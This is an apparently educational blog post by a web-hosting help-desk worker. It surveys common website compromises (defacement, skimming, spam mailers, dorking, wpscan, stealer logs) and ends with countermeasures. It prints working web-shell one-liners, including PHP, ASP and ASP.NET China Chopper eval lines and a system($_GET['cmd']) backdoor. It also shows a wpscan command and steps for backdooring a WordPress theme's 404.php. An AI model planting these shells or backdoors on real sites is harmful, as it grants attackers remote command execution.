NOTE: 'adamwallwork.xyz'/'adamwallwork.com' used in this blog post belong to the author!

Introduction

The following blog post covers common security threats and attacks (with basic demonstrations) I see on a daily basis working on the help desk for three web hosting providers. I see many easy, low-effort, and unsophisticated compromises that affect many of our customers.

I believe that if so many websites are being compromised so often, then either the attackers are super genius hackers or the methods used to compromise the websites are super easy. I find the latter to be true.

Some of the common threats I see are web shells (see Figure 1), defacements, skimmers, email spam malware, low-hanging fruit vulnerabilities exploited, and credential exposures.

Threat Actor Motivations and Reasoning

Craving Notoriety: Website Defacements

Website defacement attacks can be considered digital graffiti. In this relatively annoying, juvenile, and reputationally damaging attack, attackers gain unauthorised access to a target website and replace the site's original index file with one of their own, as seen in Figure 2.

Common ways unauthorised access is achieved can vary from buying access to already compromised websites (see Figures 17 & 18), using leaked, cracked, or stolen credentials and auth cookies, exploiting common web app/API vulnerabilities and vulnerable CMS plugins, and attacking network services (FTP, SSH, SMB, HTTP, RDP, VNC, VPN, SQL, and DNS).

Figure 1 is an example of a commonly used web shell called WSO. Web shells can be fully featured like other commonly used shells such as WSO, r57, China Chopper, c99, Ani-Shell, and smevk, or they can be as simple as the below PHP example:

<?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>

China Chopper:

PHP: <?php @eval($_POST['chopper']);?>
ASP: <%eval request("chopper")%>
ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>

PHP is a common server-side programming language used by more than 87,790,861 websites on the internet. However, web shells can also be written in languages such as ASP, ASPX, and JSP.

Figure 2 shows a common example of a website defacement. The goal for the attacker is usually to gain some sort of notoriety or infamy, or they are seeking to spread a religious, ideological, or political message (hacktivism).

After a website is defaced, attackers will use defacement mirrors such as zone-h (see Figure 3), which will archive the attack permanently to prove that they did hack a target's website, as website defacements typically do not last long once the webmaster discovers the attack.

Financial Gain: Web Skimming

With the rise of the internet came a new and easier way to buy and sell products and services online. With WooCommerce, Shopify, Magento, and others, it has never been easier to create an e-commerce website. In the past, online shops would store customer payment information in their database, which was routinely stolen by threat actors who then would sell the stolen credit cards. Now online shops use third-party payment processors like Google Pay, Apple Pay, PayPal, Visa, and MasterCard so that online shops don't need to store customer payment information anymore, reducing the risk of stolen databases full of credit cards (encrypted or not).

Magecart is a type of cybercrime whereby criminal actors compromise websites that have payment processors and checkout pages on their websites, inject malicious code (JS/PHP), which is designed to steal the card information, and then sell it through darknet markets. Notable victims of these attacks are British Airways, Ticket Master, and Newegg.

Figure 3 is JavaScript malware called GetBilling, which was used by e-skimming gangs to steal customer payment information. This is achieved by compromising the shop commonly through exploiting stolen/leaked credentials and CMS plugin vulnerabilities (read more here), and injecting malicious JavaScript code designed to skim payment information from checkout pages.

E-mail: Mass Email Spam Campaigns

Since working on the help desk for a web hosting provider, I have seen customer websites being infected with Leaf PHPMailer to spam emails en masse. I can only assume their motivations for doing this are to spam emails sent from legitimate domains that are not on blacklists and to use the victims host resources.

To spam emails using LeafMailer, attackers will first compromise any given website that their scan bots find to be vulnerable. They will then upload the mailer script, using the newly compromised server, use the victim's email address, and under 'Email List', prove hundreds and thousands of email addresses to spam to. The email contents can contain anything the attacker wants. However, in the cases I have seen this used, the attackers don't provide an email attachment to malware or malicious links, so the motives behind this are still unclear to me. However, I can imagine other threat actors including malware and links as part of their campaigns.

Malware: Hosting Malware for Future Attacks

It has been seen that threat actors will compromise random vulnerable websites so that they can use the newly compromised server to host their malware, which can then be used to download from and execute inside victim networks. One such example could be exploiting a vulnerable WordPress plugin and then uploading your malware payload so that later, when the threat actor compromises an active directory network, they then go and download the malware to run in the victim's network, making it harder to identify and block the source of the malware. This is done to make investigations harder by obfuscating their infrastructure.

Botnet: Botnet Herding

The goal of botnet herding is to compromise as many servers as possible and incorporate each new machine into a network of zombies, which will act as a larger botnet that can then be used to attack other systems. Initially compromised bots will upload a script or binary to a server, and once executed, that server will be part of a larger botnet. Attacks that these botnets carry out typically involve performing large-scale DDoS attacks against other web services, but they can also be used for mass e-mail spam, data harvesting, proxy networks, etc.

Proxy: Bounce Box

A bounce box is a term used to refer to a compromised server that is being used effectively as a proxy by an attacker to attack another potential victim. They can be used to hide the IP address of the main stable server (C&C), scan ports for the whole internet, download a database via SQLi, or, as seen in Figure 6, be used as a proxy to access other websites.

The main benefit to doing this is ensuring that the attacker not only covers their tracks but ensures that the only IP/domain that gets blacklisted is the already compromised victim and not their main server IPs, which would make future operations harder and less efficient.

An example scenario is that an attacker has already compromised a website admin's credentials and wants to log in to their admin panel or access a web shell already installed on the victim. They will use server1 ('adamwallwork.xyz') to access server2 ('adamwallwork.com') to hide their originating IP address. The proxy in use for this demonstration is a PHP browser-based proxy. However, attackers could simply use an already compromised server or configure a socks5 or HTTP proxy instead to be used via the command line in conjunction with penetration testing tools.

Data Theft: Database Exfiltration

After a website has been compromised, the threat actor may decide to exfiltrate the victim's database if the website processes a lot of valuable user data such as phone numbers, email addresses, address information, billing information, dates of birth, and other personally identifiable information (PII). If the compromised victim website does house this kind of data in large numbers, then threat actors commonly use a tool called Adminer.

Adminer is a common tool that is misused to authenticate into a hacked database (credentials for the database can often be found in the config files of the CMS). Using Adminer, a malicious actor can easily exfiltrate all the tables in a database without needing to know any SQL commands.

Threat Actor Methodologies

Google Dorking

A common technique used by many threat actors is to utilise special Google search queries called dorks (also works on Bing and DuckDuckGo), otherwise referred to as Google Dorking, to find vulnerable parameters and endpoints in web applications and APIs. A good tool to use to find different Google Dorks is a website called the Google Hacking Database (GHDB).

A common scenario is a threat actor Google dorking for admin login pages and then testing them to see if they are vulnerable to SQLi authentication bypass. This is commonly used to bypass admin login authentication and upload web shells to the server, as many admin panels don't run file checks on the files uploaded as there is an inherent trust with the admin user.

To start we look for "admin login" Google dorks to use in the GHDB directory as seen in figure 8. Using 'intitle:"Admin Login" inurl:"admin" intext:"Admin Login"' we find an admin panel (see Figure 10).

Testing the admin login using SQLi payloads, we find that the login is vulnerable to SQLi, which we can use to bypass authentication and login as user "admin".

From here, all an attacker would need to do is upload a malicious file, commonly a web shell (see Figure 1), and then the attacker will have complete control over the server.

Vulnerability Scanning: En Masse Exploitation

A lot of attacks are fully automated and not human at the keyboard-driven. Scan bots are bots that scan the internet for common vulnerabilities and exposures (CVEs), misconfigurations, and fuzz parameters for injection vulnerabilities, then report the discovered vulnerability back to the bot master, who will then use publicly available exploits to gain initial access.

Other attacks do include more of a manual approach where malicious attackers will 'google dork >> port and vulnerability scan a target >> exploit discovered vulnerability >> profit'. However, unsophisticated attackers don't need to worry about making their own malicious vulnerability scanning bot to scan the internet for low-hanging fruit vulnerabilities, as there are services that can do that for them.

Shodan is a search engine for Internet of Things (IoT) devices. Shodan scans the internet, identifies systems, and lists common findings such as open ports, vulnerabilities (see Figure 12), web stack technology in use, general hosting information, services that are running, and much more. Attackers can use Shodan and other search engines (Censys, Zoomeye) to discover vulnerable systems to later exploit.

Common Tactics, Techniques & Procedures - TTPs

Account Compromise

Accounts can be compromised via many different methods, from info stealer malware exfiltrating session cookies and passwords, password attacks (brute-force), configuration files containing credentials being misconfigured and exposed, to data breaches where other web services are compromised and their databases leaked.

Brute-Force Attacks

Brute-force attacks are really common and even more so since most of the attacks that target default ports are bots constantly smashing network services. If your server is configured without basic protections in place, such as changing the default port (reducing the number of automated attacks), a firewall (UFW), fail2ban, and key authentication with password authentication and root user disabled, then bots and determined attackers can easily attempt brute-force attacks against your server. If your password is weak enough, a brute-force attack will enable attackers to gain remote access to your server (see Figure 13).

Leaked Credentials

Tools like Nikto scan web servers for common misconfigurations, let that be a poorly configured web server, incorrect file permissions on sensitive files that may contain FTP credentials exposed to the public internet, or known CVE vulnerabilities. A common technique is using tools like Nikto to scan a large number of hosts looking for files such as '.env'/'.git'/'.db'/'.old'/, which may contain valid credentials used later in attacks.

Another method of looking for leaked credentials is searching through public code repositories using a technique called "GitHub Dorking", similar to Google Dorking ('inurl:"/.env" filetype:env). However, this time we are searching for leaked information in source code files. This could be API keys, passwords, cryptographic private keys, cloud private keys, etc.

Attackers use these methods to compromise cloud assets and CMS admin panels or to compromise a server entirely via a leaked private key.

Info Stealer Logs

Info stealer malware is a troublesome piece of malicious software whose purpose is to exfiltrate sensitive information (login credentials, cryptocurrency wallets, payment card information, fingerprints, browser cookies, and browser auto-fill data) from personal computers to then be later sold on dark web markets and telegram channels for threat actors to buy to then use in later attacks. We have seen attacks on large businesses where the initial access vector was simply purchasing an info stealer log.

Gaining initial access via purchasing stealer logs is becoming more and more common because the only barrier to entry is first knowing where to buy these logs and then being able to buy them (£). As long as you have some spare change and the right connections, you can buy dumps of logs and start grepping through them for organisation login portals. Some logs may even contain active session cookies, enabling threat actors to bypass 2FA and, if not, then perform MFA bombing.

Noteable Info Stealer Driven Attacks

• Orange Spain RIPE Account Hacked
• Infostealer Infection of an Orange Employee Results in BGP Disruptions
• An Avoidable Breach: FBI Hacker Leaks Sensitive Airbus Data
• UNC5537 Snowflake Data Theft and Extortion
• Medibank Breach: Security Failures

While filtering through stealer logs for initial access vectors to compromise a website, you can identify potential entry points by looking for '/wp-admin', 'wp-login', ':2083', ':2087', ':2096', '/user/login', '/administrator', '/login', and '/admin', among others.

Data Breach Credentials

Year after year there continues to be one constant, that of data breaches, where organisations and businesses of any size get compromised and have their customer details leaked onto the internet either through the sale of a database or it being leaked for public consumption.

Threat actors take advantage of data breach data by extracting email addresses, usernames, and passwords to then perform password stuffing attacks to compromise accounts against services to later sell.

Haveibeenpwned (see Figure 15) is a service you can use to search for your email address to see whether it has been involved in a data breach. If it comes back red saying "Oh no — pwned!" then this means your information is available for cybercriminals to possibly take advantage of. This is why it is really important to use strong and complicated passwords and ensure that you do not recycle your passwords across different online services.

Threat actors can use services like haveibeenpwned and exposed (see Figure 16) to first verify if a web admin email address (often found on their website) has appeared in a public data breach, and if so, they go on to search for their credentials (see Figure 16).

Marketplaces - Buying Access

Cybercriminal marketplaces have made the cybercrime economy more and more efficient, with it now being referred to as "cybercrime as a service" where unsophisticated and unskilled threat actors simply purchase a product (malware-as-a-service) or pay to have access to a service (Genesis market) to then later compromise. All a would-be cybercriminal needs is access to a little bit of money to simply buy their way into someone's network without needing to utilise any skills to gain the initial access.

We take a look at two very popular and common marketplaces for buying web shells hosted on already compromised websites for threat actors to buy and then be able to access hacked sites without needing to compromise them for themselves.

Buying Web shells

We aren't going to directly name these marketplaces. However, they offer a wide array of products to their customers. This includes buying access to compromised cPanel/WHM accounts, 'wp-admin' accounts, web shells, and much more. These marketplaces are frequented by less skilled actors who want to be able to buy access to websites for a wide array of different reasons, most of which we have already covered previously at the start of this blog post.

With buying access to compromised websites being so easy and cheap (see Figures 17 & 18), it's no wonder how so many websites become compromised so easily and so quickly.

Content Management System Exploitation

Content management systems (CMS) such as WordPress, OpenCart, Drupal, Magento, Joomla, WooCommerce, and Prestashop exist to make the process of developing a website easy. Web hosting providers automate the installation process for the customer via Installatron so that all a customer needs to focus on is adding content to their website, removing the need to learn anything technical. Because of this, many CMS admins don't have the required basic technical knowledge about website security to protect their websites from attacks.

Often CMS admins don't update their plugins or themes, use weak passwords, lack 2FA authentication, and don't have any server-side malware scanner to detect and prevent web shells.

XML-RPC Brute-Force

WordPress by default comes with a file called 'xmlrpc.php' which is an API used for mobile users to authenticate to their WordPress website. 'wp-admin' can be rate-limited, where if you fail to enter a correct password for a user more than X times, you will have to wait 15 minutes before trying again, or you will lock the account out, alerting the administrator to malicious login attempts.

To avoid this, the 'xml-rpc' API allows for unlimited authentication attempts and does not alert web admins to malicious login attempts. This allows attackers to brute-force WordPress user accounts.

To brute-force the xml-rpc API, we're going to use a common tool favoured by ethical penetration testers, site admins, and threat actors called wpscan (see Figure 19). Features of wpscan allow an attacker to enumerate, vulnerability scan (see Example 1) and perform brute-force attacks.

Plugin Exploitation

Continuing from wpscan, we will now simulate an attacker by using wpscan to vulnerability scan a target's WordPress site. We first enumerate (-e) the target for their installed plugins and themes, scan them for vulnerabilities (vp), and using the references provided, use a public exploit to exploit the discovered vulnerability (see Figure 20).

wpscan --url blog.adamwallwork.xyz -e vp --plugins-detection mixed --api-token <TOKEN>

[i] Plugin(s) Identified:

[+] brandfolder
 | Location: https://blog.adamwallwork.xyz/wp-content/plugins/brandfolder/
 | Last Updated: 2024-05-15T14:00:00.000Z
 | Readme: https://blog.adamwallwork.xyz/wp-content/plugins/brandfolder/readme.txt
 | [!] The version is out of date, the latest version is 5.0.18
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Brandfolder <= 3.0 - File Inclusion
 |     Fixed in: 3.0.1
 |     References:
 |      - https://wpscan.com/vulnerability/f850e182-f9c6-4264-b2b1-e587447fe4b1
 |      - https://www.exploit-db.com/exploits/39591/
 |      - https://plugins.trac.wordpress.org/changeset/1377152/brandfolder

[+] mail-masta
 | Location: https://blog.adamwallwork.xyz/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 | Readme: https://blog.adamwallwork.xyz/wp-content/plugins/mail-masta/readme.txt
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta <= 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/5136d5cf-43c7-4d09-bf14-75ff8b77bb44
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://www.exploit-db.com/exploits/50226/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpscan.com/vulnerability/c992d921-4f5a-403a-9482-3131c69e383a
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6570
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6571
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6572
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6573
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6574
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6575
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6576
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6577
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6578
 |      - https://www.exploit-db.com/exploits/41438/
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin

Example 1: wpscan results

Web Shell Persistence via Theme Editor

After gaining initial access via brute-forcing the admin user (see Figure 19), we gain access to the WordPress admin dashboard. From here, our goal is to persist in our access and remain undetected for as long as possible.

To do this, we will want to edit the PHP source code files of a theme that is not currently in use (Twenty Sixteen). When you install a new WordPress website, it will come with default themes, themes that will likely not be removed or used (unused assets). We can backdoor one of the default themes to persist our access by editing a non-critical file such as the '404.php' file.

Appearance > Themes > Editor > select theme to edit > Twenty Sixteen > Theme Files > 404 Template (404.php) > Update File (https://blog.adamwallwork.xyz/wp-content/themes/twentysixteen/404.php)

Example 2: Logging in as admin and backdooring the site

We have included 'system($_GET['cmd']);' (see Figure 21), which will act as our backdoor, allowing us to execute commands on the victim server. We can validate that we have achieved remote command execution (RCE) (see Figure 22) by entering '404.php?cmd=pwd;ls'.

Other Common Methods

Other common methods of exploiting websites and services to gain initial access are your typical low-hanging fruit vulnerabilities, which include SQL injection (SQLi), common web server misconfigurations, file uploads, cross-site scripting (XSS), and others. These types of vulnerabilities are commonly exploited due to their low complexity and given the fact that most vulnerability scanners can easily detect them where publicly available automated tools and exploits can easily exploit them.

I see a lot of (in customer access server logs) different payloads and random HTTP (GET, POST, PUT, HEAD) requests that are made by scanners. Some of the scanners and tools I've seen in the logs are listed below in Table 1.

Tools	Description
Sqlmap	Automatically detects and exploits SQLi
Wpscan	Enumerates, vulnerability scans & brute-forces user accounts
Commix	Automatically exploits command injection vulnerabilities
Ffuf	Fuzzes endpoints and parameters for files and vulnerabilities
Seclists	Collection of useful wordlists to be used with tools like wpscan & ffuf
Nuclei	YAML template based vulnerability scanner
Nmap	Port and vulnerability scanner (NSE)
Metasploit	Exploit framework
Dirsearch	Brute-forces web directories and files
Burpsuite	Intercept proxy
Weeveley3	Sneaky web shell
Searchsploit	Search for public exploits
PayloadsAllTheThings	List of useful payloads
Masscan	Port scan the entire internet

Table 1: Common tools of the trade

Practical Countermeasures

The threats that have been covered in this blog post can be largely mitigated by following cybersecurity best practices. These include implementing a web application firewall to protect against exploits, fully updating your web technology stack, hashing and encrypting sensitive information in databases, implementing MFA, rate limiting, temporary account lockouts and strong passwords, malware scanning your server, removing any unused assets from your websites such as themes and plugins that are no longer in use, and following secure coding practices when developing custom web applications and APIs.

By doing this, you can largely mitigate automated, random, and opportunistic attacks against your websites and ensure that your customer data remains safe and secure.

Conclusion

We have used basic examples throughout this blog post to demonstrate common threats that I have seen while working on the help desk for a web hosting provider. They're basic because these are the type of easy, low-hanging fruit exploits that are commonly exploited in the wild. Most attacks are random and opportunistic, which require very little skill and effort. It's a great example of why you should always ensure that you are running up-to-date software on your websites and ensuring that your developers follow secure coding practices.

Tags